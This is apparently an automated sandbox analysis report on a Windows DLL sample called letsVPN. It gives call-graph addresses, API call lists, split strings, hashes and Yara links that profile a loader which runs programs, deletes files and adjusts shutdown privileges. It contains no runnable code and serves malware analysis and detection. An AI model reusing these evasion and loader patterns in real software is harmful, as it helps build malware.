_lseeki64_nolock 6 API calls 18054->18060 18056 180015dc8 _errno 3 API calls 18055->18056 18056->18052 18057->18052 18063 1800183b4 _lseeki64_nolock 6 API calls 18057->18063 18058->18053 18062 1800183b4 _lseeki64_nolock 6 API calls 18058->18062 18059->18052 18061 180015d78 _dosmaperr 3 API calls 18059->18061 18060->18059 18061->18052 18062->18058 18063->18057 18065 18001ecb8 18064->18065 18066 18001ed27 18064->18066 18065->18066 18069 18001ecea 18065->18069 18067 180015dc8 _errno 3 API calls 18066->18067 18068 18001ed1a 18067->18068 18068->17996 18069->18068 18070 18001ed12 SetStdHandle 18069->18070 18070->18068 18072 18001eeb6 18071->18072 18073 18001eea9 18071->18073 18075 180015dc8 _errno 3 API calls 18072->18075 18076 18001eeae 18072->18076 18074 180015dc8 _errno 3 API calls 18073->18074 18074->18076 18077 18001eeed 18075->18077 18076->18042 18076->18043 18078 180016cfc _invalid_parameter_noinfo 2 API calls 18077->18078 18078->18076 18079 1800076bf 18080 1800076c5 _read_nolock 18079->18080 18081 1800076db 18080->18081 18088 180003cfc 18080->18088 18083 1800076d1 18086 180003bf4 GetTickCount64 Sleep SleepEx 18083->18086 18085 1800076d6 18085->18081 18087 180003c32 18086->18087 18087->18085 18089 180003d18 18088->18089 18090 180003d0f ExitProcess 18088->18090 18089->18083 18090->18089 18091 1800187bf WaitForSingleObject 18092 1800187d3 GetExitCodeProcess 18091->18092 18093 1800187ea _read_nolock 18091->18093 18092->18093 18098 1800187e5 __termconin 18092->18098 18094 1800187f5 18093->18094 18096 18001880d _read_nolock 18093->18096 18095 180015dc8 _errno 3 API calls 18094->18095 18095->18098 18097 180015d78 _dosmaperr 3 API calls 18096->18097 18097->18098 18099 1800030e0 18100 180003cfc ExitProcess 18099->18100 18101 1800030e9 18100->18101 18108 180003848 GetCurrentProcess OpenProcessToken 18101->18108 18107 1800030fd 18109 18000389a LookupPrivilegeValueW 18108->18109 18116 180003893 __termconin 18108->18116 18110 1800038b1 AdjustTokenPrivileges 18109->18110 18109->18116 18113 1800038ed _read_nolock 18110->18113 18110->18116 18111 180012200 std::system_error::system_error IsProcessorFeaturePresent 18112 1800030ee 18111->18112 18117 180011938 GetSystemTimeAsFileTime 18112->18117 18113->18116 18122 180011498 18113->18122 18116->18111 18118 1800030f5 18117->18118 18119 180011040 18118->18119 18120 18001a35c _getptd 16 API calls 18119->18120 18121 18001104d 18120->18121 18121->18107 18123 1800114c3 18122->18123 18124 1800114d8 18122->18124 18126 180015dc8 _errno 3 API calls 18123->18126 18125 180015060 _calloc_crt 3 API calls 18124->18125 18127 1800114e7 18125->18127 18128 1800114c8 18126->18128 18129 18001154f _read_nolock 18127->18129 18131 18001a35c _getptd 16 API calls 18127->18131 18130 180016cfc _invalid_parameter_noinfo 2 API calls 18128->18130 18132 180011058 free 3 API calls 18129->18132 18133 18000391a Sleep 18130->18133 18134 1800114f4 _initptd 18131->18134 18135 18001155f 18132->18135 18133->18116 18136 180011503 CreateThread 18134->18136 18135->18133 18137 180015d78 _dosmaperr 3 API calls 18135->18137 18136->18129 18136->18133 18137->18133

                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                    Function 000000018000583A Relevance: 51.5, APIs: 17, Strings: 12, Instructions: 786librarysleeploaderCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 0 18000583a-18000586a call 18000eaf0 3 180005878-180005896 0->3 4 18000586c-180005873 call 18000eaf0 0->4 6 1800058a4-1800058c2 3->6 7 180005898-18000589f call 18000eaf0 3->7 4->3 9 1800058c4-1800058cb call 18000eaf0 6->9 10 1800058d0-1800058ee 6->10 7->6 9->10 12 1800058fc-180005945 call 180002028 10->12 13 1800058f0-1800058f7 call 18000eaf0 10->13 17 180005b9a-180005d97 call 180006a90 call 1800018e4 LoadLibraryW call 18002a158 ShellExecuteW LoadLibraryW call 18002a158 Sleep DeleteFileW call 180003948 12->17 18 18000594b 12->18 13->12 41 180005d99 17->41 42 180005d9c-180005de6 call 180002f78 call 180003b3c call 1800016d0 call 1800015f4 17->42 19 18000594f-1800059c3 call 180005394 call 180009490 call 1800014c4 18->19 34 1800059d1-180005aaa call 18000151c call 18000146c call 180001430 call 18000146c 19->34 35 1800059c5-1800059cc call 18000eaf0 19->35 54 180005ab8-180005ad5 34->54 55 180005aac-180005ab3 call 18000eaf0 34->55 35->34 41->42 65 180005df1-180005e05 42->65 66 180005de8-180005dec call 18000eaf0 42->66 59 180005ae3-180005afd 54->59 60 180005ad7-180005ade call 18000eaf0 54->60 55->54 63 180005b08-180005b38 call 180001220 call 180001a20 59->63 64 180005aff-180005b03 call 18000eaf0 59->64 60->59 81 180005b46-180005b63 63->81 82 180005b3a-180005b41 call 18000eaf0 63->82 64->63 70 180005e13-180005e30 65->70 71 180005e07-180005e0e call 18000eaf0 65->71 66->65 75 180005e32-180005e39 call 18000eaf0 70->75 76 180005e3e-180005e5c 70->76 71->70 75->76 79 180005e6a-180005eb7 CreateDirectoryW call 180003948 76->79 80 180005e5e-180005e65 call 18000eaf0 76->80 89 180005eb9 79->89 90 180005ebc-180005f1a call 180002f78 call 180001808 call 1800015f4 call 1800016d0 79->90 80->79 86 180005b72-180005b7a 81->86 87 180005b65-180005b71 call 18000eaf0 81->87 82->81 92 180005b88-180005b8e 86->92 93 180005b7c-180005b83 call 18000eaf0 86->93 87->86 89->90 105 180005f28-180005f45 90->105 106 180005f1c-180005f23 call 18000eaf0 90->106 92->19 97 180005b94 92->97 93->92 97->17 108 180005f53-180005f70 105->108 109 180005f47-180005f4e call 18000eaf0 105->109 106->105 110 180005f72-180005f79 call 18000eaf0 108->110 111 180005f7e-180005f9c 108->111 109->108 110->111 114 180005faa-180005ff6 call 180006b28 Sleep 111->114 115 180005f9e-180005fa5 call 18000eaf0 111->115 119 180005ff8-180005ffb 114->119 120 180005ffd 114->120 115->114 121 180006005-1800060d2 call 180005638 call 180003e68 call 180001808 call 1800016d0 119->121 120->121 122 180006000 call 1800103cc 120->122 131 1800060d4-1800060d8 call 18000eaf0 121->131 132 1800060dd-18000622a call 1800018e4 call 180001808 * 5 call 1800016d0 121->132 122->121 131->132 148 180006238-1800062d7 call 1800018e4 call 18000167c * 2 132->148 149 18000622c-180006233 call 18000eaf0 132->149 157 1800062e5-1800062ff 148->157 158 1800062d9-1800062e0 call 18000eaf0 148->158 149->148 160 180006301-180006305 call 18000eaf0 157->160 161 18000630a-1800063cf call 180003b3c call 1800016d0 * 2 157->161 158->157 160->161 169 1800063d1-1800063d8 call 18000eaf0 161->169 170 1800063dd-1800063fa 161->170 169->170 172 180006408-18000645d call 180003b3c call 1800016d0 * 2 170->172 173 1800063fc-180006403 call 18000eaf0 170->173 181 18000646b-180006485 172->181 182 18000645f-180006466 call 18000eaf0 172->182 173->172 184 180006487-18000648b call 18000eaf0 181->184 185 180006490-18000661c call 180003b3c call 18000547c call 180005540 * 2 call 180003d20 Sleep ShellExecuteW Sleep 181->185 182->181 184->185 197 180006623 185->197 198 18000661e-180006621 185->198 199 18000662f-180006676 call 180005638 197->199 200 18000662a call 1800103cc 197->200 198->199 203 180006678-18000667b 199->203 204 18000667d 199->204 200->199 205 180006685-1800067e4 call 180005638 * 2 call 180002270 call 18000310c Sleep call 180002270 * 4 call 18000310c DeleteFileW * 3 call 180004df0 203->205 204->205 206 180006680 call 1800103cc 204->206 226 1800067e9-18000693d call 180004df0 * 13 call 18000286c call 18000e8b0 call 180004df0 call 180004e58 call 180012200 205->226 206->205
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressLibraryLoadProcSleep$CreateDeleteDirectoryExecuteFileShell
                                                                                                                                                                                                    • String ID: 255$ sta$.0.0$1.0.$Dele$Shel$cute$lExe$leW$teFi$tic $~16
                                                                                                                                                                                                    • API String ID: 1872526433-501238091
                                                                                                                                                                                                    • Opcode ID: 2de8ca2edf32e5d592ad1db038b95d3c579e97f9fa53fb0bd541c60e535d2964
                                                                                                                                                                                                    • Instruction ID: c9c4ca4ab1ae5be6749216688ddcecd4b28c08cb2a744ea5c2d942ebc46c746f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2de8ca2edf32e5d592ad1db038b95d3c579e97f9fa53fb0bd541c60e535d2964
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73920572211BC88AE7B2DF20DC947DD33A5F74938CF809125EA495BAAADF718748C744
                                                                                                                                                                                                    Function 00000001800057CD Relevance: 44.5, APIs: 17, Strings: 8, Instructions: 715COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 263 1800057cd-18000586a call 180002f78 call 180003b3c call 1800016d0 call 1800015f4 call 1800016d0 275 180005878-180005896 263->275 276 18000586c-180005873 call 18000eaf0 263->276 278 1800058a4-1800058c2 275->278 279 180005898-18000589f call 18000eaf0 275->279 276->275 281 1800058c4-1800058cb call 18000eaf0 278->281 282 1800058d0-1800058ee 278->282 279->278 281->282 284 1800058fc-180005945 call 180002028 282->284 285 1800058f0-1800058f7 call 18000eaf0 282->285 289 180005b9a-180005d97 call 180006a90 call 1800018e4 LoadLibraryW call 18002a158 ShellExecuteW LoadLibraryW call 18002a158 Sleep DeleteFileW call 180003948 284->289 290 18000594b 284->290 285->284 313 180005d99 289->313 314 180005d9c-180005de6 call 180002f78 call 180003b3c call 1800016d0 call 1800015f4 289->314 291 18000594f-1800059c3 call 180005394 call 180009490 call 1800014c4 290->291 306 1800059d1-180005aaa call 18000151c call 18000146c call 180001430 call 18000146c 291->306 307 1800059c5-1800059cc call 18000eaf0 291->307 326 180005ab8-180005ad5 306->326 327 180005aac-180005ab3 call 18000eaf0 306->327 307->306 313->314 337 180005df1-180005e05 314->337 338 180005de8-180005dec call 18000eaf0 314->338 331 180005ae3-180005afd 326->331 332 180005ad7-180005ade call 18000eaf0 326->332 327->326 335 180005b08-180005b38 call 180001220 call 180001a20 331->335 336 180005aff-180005b03 call 18000eaf0 331->336 332->331 353 180005b46-180005b63 335->353 354 180005b3a-180005b41 call 18000eaf0 335->354 336->335 342 180005e13-180005e30 337->342 343 180005e07-180005e0e call 18000eaf0 337->343 338->337 347 180005e32-180005e39 call 18000eaf0 342->347 348 180005e3e-180005e5c 342->348 343->342 347->348 351 180005e6a-180005eb7 CreateDirectoryW call 180003948 348->351 352 180005e5e-180005e65 call 18000eaf0 348->352 361 180005eb9 351->361 362 180005ebc-180005f1a call 180002f78 call 180001808 call 1800015f4 call 1800016d0 351->362 352->351 358 180005b72-180005b7a 353->358 359 180005b65-180005b71 call 18000eaf0 353->359 354->353 364 180005b88-180005b8e 358->364 365 180005b7c-180005b83 call 18000eaf0 358->365 359->358 361->362 377 180005f28-180005f45 362->377 378 180005f1c-180005f23 call 18000eaf0 362->378 364->291 369 180005b94 364->369 365->364 369->289 380 180005f53-180005f70 377->380 381 180005f47-180005f4e call 18000eaf0 377->381 378->377 382 180005f72-180005f79 call 18000eaf0 380->382 383 180005f7e-180005f9c 380->383 381->380 382->383 386 180005faa-180005ff6 call 180006b28 Sleep 383->386 387 180005f9e-180005fa5 call 18000eaf0 383->387 391 180005ff8-180005ffb 386->391 392 180005ffd 386->392 387->386 393 180006005-1800060d2 call 180005638 call 180003e68 call 180001808 call 1800016d0 391->393 392->393 394 180006000 call 1800103cc 392->394 403 1800060d4-1800060d8 call 18000eaf0 393->403 404 1800060dd-18000622a call 1800018e4 call 180001808 * 5 call 1800016d0 393->404 394->393 403->404 420 180006238-1800062d7 call 1800018e4 call 18000167c * 2 404->420 421 18000622c-180006233 call 18000eaf0 404->421 429 1800062e5-1800062ff 420->429 430 1800062d9-1800062e0 call 18000eaf0 420->430 421->420 432 180006301-180006305 call 18000eaf0 429->432 433 18000630a-1800063cf call 180003b3c call 1800016d0 * 2 429->433 430->429 432->433 441 1800063d1-1800063d8 call 18000eaf0 433->441 442 1800063dd-1800063fa 433->442 441->442 444 180006408-18000645d call 180003b3c call 1800016d0 * 2 442->444 445 1800063fc-180006403 call 18000eaf0 442->445 453 18000646b-180006485 444->453 454 18000645f-180006466 call 18000eaf0 444->454 445->444 456 180006487-18000648b call 18000eaf0 453->456 457 180006490-18000661c call 180003b3c call 18000547c call 180005540 * 2 call 180003d20 Sleep ShellExecuteW Sleep 453->457 454->453 456->457 469 180006623 457->469 470 18000661e-180006621 457->470 471 18000662f-180006676 call 180005638 469->471 472 18000662a call 1800103cc 469->472 470->471 475 180006678-18000667b 471->475 476 18000667d 471->476 472->471 477 180006685-18000693d call 180005638 * 2 call 180002270 call 18000310c Sleep call 180002270 * 4 call 18000310c DeleteFileW * 3 call 180004df0 * 14 call 18000286c call 18000e8b0 call 180004df0 call 180004e58 call 180012200 475->477 476->477 478 180006680 call 1800103cc 476->478 478->477
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$FolderFromListLocationPathSpecial
                                                                                                                                                                                                    • String ID: 1.0.$Dele$Shel$cute$lExe$leW$teFi$~16
                                                                                                                                                                                                    • API String ID: 790480582-1993818955
                                                                                                                                                                                                    • Opcode ID: ac54990aac95bf2d28a7a146e9c6009a6d1eeca20118406b1ef1424830b8656c
                                                                                                                                                                                                    • Instruction ID: be1e63a572210f39efd37311244dc54493d0b04b1b8e40341aa798d8d538536b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac54990aac95bf2d28a7a146e9c6009a6d1eeca20118406b1ef1424830b8656c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37821872211BC88AE7B2DF20DC947DD33A5F74938CF809125EA494BAAADF758748C744
                                                                                                                                                                                                    Function 000000018000310C Relevance: 21.4, APIs: 14, Instructions: 411memorycomCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 794 18000310c-1800031de CoInitialize CoImpersonateClient CoInitializeSecurity call 1800113f0 call 18000547c call 180003754 801 1800031e3-1800031f8 call 180002f78 794->801 802 1800031e0 794->802 805 1800031fa 801->805 806 1800031fd-18000320e CLSIDFromProgID 801->806 802->801 805->806 807 180003219-180003230 806->807 808 180003210-180003214 call 18000eaf0 806->808 810 180003232-180003236 call 18000eaf0 807->810 811 18000323b-180003263 CoCreateInstance 807->811 808->807 810->811 812 180003269-1800032b5 VariantInit call 1800113f0 call 18000547c call 180003754 811->812 813 1800036aa-1800036b9 CoUninitialize 811->813 838 1800032b7 812->838 839 1800032ba-1800032ca call 180002f78 812->839 816 1800036c2-1800036c6 813->816 817 1800036bb-1800036c1 813->817 819 1800036c8-1800036cb call 18000eaf0 816->819 820 1800036d0-1800036e1 816->820 817->816 819->820 824 1800036e3-1800036e7 call 18000eaf0 820->824 825 1800036ec-1800036ff 820->825 824->825 828 180003701-180003704 call 18000eaf0 825->828 829 180003709-180003719 825->829 828->829 832 180003723 829->832 833 18000371b-18000371e call 18000eaf0 829->833 835 180003727-180003751 call 180012200 832->835 833->832 838->839 843 1800032cc 839->843 844 1800032cf-1800032f9 839->844 843->844 845 180003303-180003307 844->845 846 180003309-18000331b call 180003ad0 845->846 847 18000331d-180003321 845->847 846->847 849 180003323-180003327 call 18000eaf0 847->849 850 18000332c-180003342 847->850 849->850 853 180003344-180003348 call 18000eaf0 850->853 854 18000334d-18000334f 850->854 853->854 856 180003351-180003359 854->856 857 18000337a-18000338b 854->857 860 180003362-180003366 856->860 861 18000335b-180003361 856->861 858 180003397-1800033e3 VariantInit call 1800113f0 call 18000547c call 180003754 857->858 859 18000338d-180003396 857->859 873 1800033e5 858->873 874 1800033e8-1800033f8 call 180002f78 858->874 859->858 863 180003368-18000336b call 18000eaf0 860->863 864 180003370-180003375 860->864 861->860 863->864 864->820 873->874 877 1800033fa 874->877 878 1800033fd-180003433 874->878 877->878 880 180003435-180003445 call 180003ad0 878->880 881 180003447-18000344c 878->881 880->881 883 180003457-18000346d 881->883 884 18000344e-180003452 call 18000eaf0 881->884 887 180003478-18000347a 883->887 888 18000346f-180003473 call 18000eaf0 883->888 884->883 890 18000350f-180003520 887->890 891 180003480-180003492 887->891 888->887 892 180003522-18000352b 890->892 893 18000352c-180003535 890->893 896 180003494-18000349a 891->896 897 18000349b-1800034a4 891->897 892->893 895 180003538-18000354d VariantInit 893->895 895->895 899 18000354f-180003556 895->899 896->897 900 1800034a6-1800034a9 call 18000eaf0 897->900 901 1800034ae-1800034c4 897->901 902 180003558-18000355b 899->902 903 18000355d 899->903 900->901 906 1800034c6-1800034ca call 18000eaf0 901->906 907 1800034cf-1800034e2 901->907 908 180003560-18000356f SysAllocString 902->908 903->908 906->907 910 1800034e4-1800034e7 call 18000eaf0 907->910 911 1800034ec-1800034fc 907->911 912 180003571-180003575 908->912 913 180003577 908->913 910->911 916 180003506-18000350a 911->916 917 1800034fe-180003501 call 18000eaf0 911->917 915 18000357a-180003588 SysAllocString 912->915 913->915 919 18000358a-18000358d 915->919 920 18000358f 915->920 916->835 917->916 921 180003592-1800035a0 SysAllocString 919->921 920->921 922 1800035a2-1800035a5 921->922 923 1800035a7 921->923 924 1800035aa-1800035fc SysAllocString call 1800113f0 call 18000547c call 180003754 922->924 923->924 931 180003601-180003611 call 180002f78 924->931 932 1800035fe 924->932 935 180003613 931->935 936 180003616-18000363b call 180003c44 931->936 932->931 935->936 939 180003646-18000365c 936->939 940 18000363d-180003641 call 18000eaf0 936->940 942 180003667-18000366b 939->942 943 18000365e-180003662 call 18000eaf0 939->943 940->939 945 180003670-180003680 VariantClear 942->945 943->942 945->945 946 180003682-18000368d 945->946 947 180003699-1800036a7 946->947 948 18000368f-180003698 946->948 947->813 948->947
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocStringVariant$Init$Initialize$ClearClientCreateFromImpersonateInstanceProgSecurityUninitialize
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3828289656-0
                                                                                                                                                                                                    • Opcode ID: 88380749b9bff7f02a8bd9b5a1ef2fd6c32f40a06c4a83a00ea0faaacdf54457
                                                                                                                                                                                                    • Instruction ID: 8df9d348843d8f77737215da8969992bce2adc21e39d041bec8d82088d120d47
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88380749b9bff7f02a8bd9b5a1ef2fd6c32f40a06c4a83a00ea0faaacdf54457
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4126C32204B4885EB52DF61E8893DE77B8F789BC8F418025EE4A57BA5DF74C658C380
                                                                                                                                                                                                    Function 0000000180003848 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 64sleepCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesSleepValue_beginthreadex
                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                    • API String ID: 1138004472-3733053543
                                                                                                                                                                                                    • Opcode ID: d8da6024658c722b646910c3d96e45045ea0514b14bdfe8c575e50fea09f0569
                                                                                                                                                                                                    • Instruction ID: 7900f27b0b5eabe5c36217b302caede7b5b8c6614703a535c2948af9343980a6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8da6024658c722b646910c3d96e45045ea0514b14bdfe8c575e50fea09f0569
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41313C72B10B098AF792CFB1D8453ED37B4F74C79DF048426EA0AA6658DF78C2498750
                                                                                                                                                                                                    Function 0000000180006940 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1300 180006940-180006969 GetSystemInfo 1301 18000696b-18000696d 1300->1301 1302 18000696f-180006990 GlobalMemoryStatusEx 1300->1302 1303 180006993-1800069aa call 180012200 1301->1303 1302->1303
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: GlobalInfoMemoryStatusSystem
                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                    • API String ID: 248183744-2766056989
                                                                                                                                                                                                    • Opcode ID: 6ab1be835e954898ebdeb28ed991f5560ea1e6b52a6b1bd78a8faee3408ec2ef
                                                                                                                                                                                                    • Instruction ID: 831fc52dc961fc22b003951347bb0d9f027577d0a48d1bea24d334a4d92bd93f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ab1be835e954898ebdeb28ed991f5560ea1e6b52a6b1bd78a8faee3408ec2ef
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6F01236618A8487FBA1DB60E4663AEB361F7CD794F814515E68E41A55DF7CC21CCB00
                                                                                                                                                                                                    Function 000000018000CA80 Relevance: 4.6, APIs: 3, Instructions: 93fileCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1306 18000ca80-18000caaf 1307 18000cab1 1306->1307 1308 18000cabf-18000cad0 1306->1308 1311 18000cab8-18000caba 1307->1311 1309 18000cad2-18000cad6 1308->1309 1310 18000cb14-18000cb17 1308->1310 1312 18000cb32-18000cb46 call 18000eb24 1309->1312 1313 18000cad8-18000cb05 CreateFileW 1309->1313 1314 18000cb1a-18000cb2e SetFilePointer 1310->1314 1315 18000cb9a-18000cbb7 1311->1315 1320 18000cb63-18000cb7e 1312->1320 1321 18000cb48-18000cb61 1312->1321 1316 18000cb07-18000cb0d 1313->1316 1317 18000cb0f-18000cb12 1313->1317 1314->1312 1316->1311 1317->1314 1322 18000cb95-18000cb97 1320->1322 1323 18000cb80-18000cb92 SetFilePointer 1320->1323 1321->1322 1322->1315 1323->1322
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Pointer$Create
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 250661774-0
                                                                                                                                                                                                    • Opcode ID: 58049fbec35e7c4634dedcbb9b83f674b4bc32b06552d7332aa69889d7d14782
                                                                                                                                                                                                    • Instruction ID: fc990ef4cf880642924757aab6ab0feee7337a1683e05dbc252286eedef122ed
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58049fbec35e7c4634dedcbb9b83f674b4bc32b06552d7332aa69889d7d14782
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E631F6336187588AE362CF26A440B9E7FA1F388BD0F658215EF5503B90DF39C649C741
                                                                                                                                                                                                    Function 00000001800244FA Relevance: 31.8, APIs: 21, Instructions: 346COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 535 1800244fa-1800246d6 call 18001eaac call 180024290 554 180024769-180024774 GetFileType 535->554 555 1800247c2-18002482f call 18001edc4 554->555 560 180024835-180024838 555->560 561 1800248bc-1800248bf 555->561 562 180024ad7 560->562 564 18002483e-180024841 560->564 561->562 563 1800248c5-1800248d3 561->563 567 180024adb 562->567 565 1800248e3-1800248ea 563->565 566 1800248d5-1800248db 563->566 564->561 568 180024843-180024859 call 1800183b4 564->568 571 180024928 565->571 572 1800248ec-1800248f9 565->572 569 1800248e1 566->569 570 1800248dd-1800248df 566->570 573 180024ae1-180024b30 567->573 587 180024874-18002488b call 18001f1d4 568->587 588 180024868-1800248a2 call 180016e44 568->588 569->565 570->565 575 18002492c-180024932 571->575 576 180024915-180024920 572->576 577 1800248fb-180024903 572->577 578 180024b53-180024b5f 573->578 579 180024b32-180024b36 573->579 575->562 585 180024938-180024943 575->585 576->575 583 180024922-180024926 576->583 577->583 584 180024905-18002490d 577->584 581 180024b65-180024b68 578->581 582 180024bfb 578->582 579->578 586 180024b38-180024b4e 579->586 581->582 589 180024b6e-180024bab call 18002a060 call 180024290 581->589 597 180024bfd 582->597 583->575 584->575 591 18002490f-180024913 584->591 585->567 593 180024949-180024958 585->593 586->578 601 1800248a4-1800248b4 call 1800183b4 587->601 602 18002488d-180024892 587->602 588->601 627 180024be1-180024bf7 589->627 628 180024bad-180024bd7 call 18002a030 call 180015d78 call 18001eca4 589->628 591->575 598 180024a5c-180024a5f 593->598 599 18002495e-180024963 593->599 597->597 598->567 603 180024a61-180024a64 598->603 604 1800249d5-1800249e9 call 18001f1d4 599->604 605 180024965-180024967 599->605 601->588 623 1800248b6 601->623 602->601 608 180024894-180024898 602->608 611 18002498b-180024994 603->611 612 180024a6a-180024a6e 603->612 604->588 629 1800249ef-1800249f2 604->629 605->567 606 18002496d-180024970 605->606 